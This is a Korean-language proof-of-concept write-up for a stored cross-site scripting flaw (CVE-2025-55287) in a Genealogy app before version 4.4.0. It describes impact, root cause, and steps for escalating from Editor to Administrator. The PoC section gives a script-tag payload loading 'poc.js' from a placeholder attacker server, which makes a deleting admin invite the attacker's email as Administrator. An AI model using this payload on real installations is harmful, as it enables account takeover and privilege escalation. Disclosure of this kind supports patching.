CVE-2025-55287-POC
Genealogy 앱 4.4.0 이전 버전에서 인증된 저장형 크로스 사이트 스크립팅(XSS) 취약점으로, 임의의 JavaScript 실행 및 Editor+ 역할에서 Administrator로의 권한 상승이 가능합니다.
요약
- 취약점 유형: 저장형 크로스 사이트 스크립팅 (CWE-79)
- 영향을 받는 구성 요소: 'Person'의 이름과 성
- 영향을 받는 버전: 4.4.0 이전 모든 버전
- 영향: 피해자 브라우저에서 공격자가 제공한 JavaScript의 지속적 실행; 세션 하이재킹, DOM을 통한 CSRF, UI 리드레스, 자격 증명 도용 또는 피해자로서의 임의 작업 수행
- 공격 벡터: 인증됨 (새로운 인물 생성이 가능한 모든 역할 - Editor+)
악용 방법
근본 원인: 더 높은 권한의 사용자가 영향을 받는 인물을 성공적으로 삭제할 때, 해당 인물의 이름/성에 대한 서버 측 살균/인코딩이 불충분하기 때문
PoC:
- 애플리케이션에 인증합니다 (editor+ 역할).
- 새로운 인물을 생성합니다 (반드시 어떤 가족에 할당할 필요는 없음).
- 추가된 인물의 이름 또는 성에 JavaScript를 포함시킵니다:
<script src='yourserver/poc.js'></script>
- poc.js 파일을 편집하여 플레이스홀더에 자신의 이메일 주소를 입력합니다.
- 권한 있는 사용자가 새로 추가된 인물을 삭제하려고 시도하면, 제공된 이메일 주소로 Administrator 역할로 플랫폼에 초대를 받게 됩니다.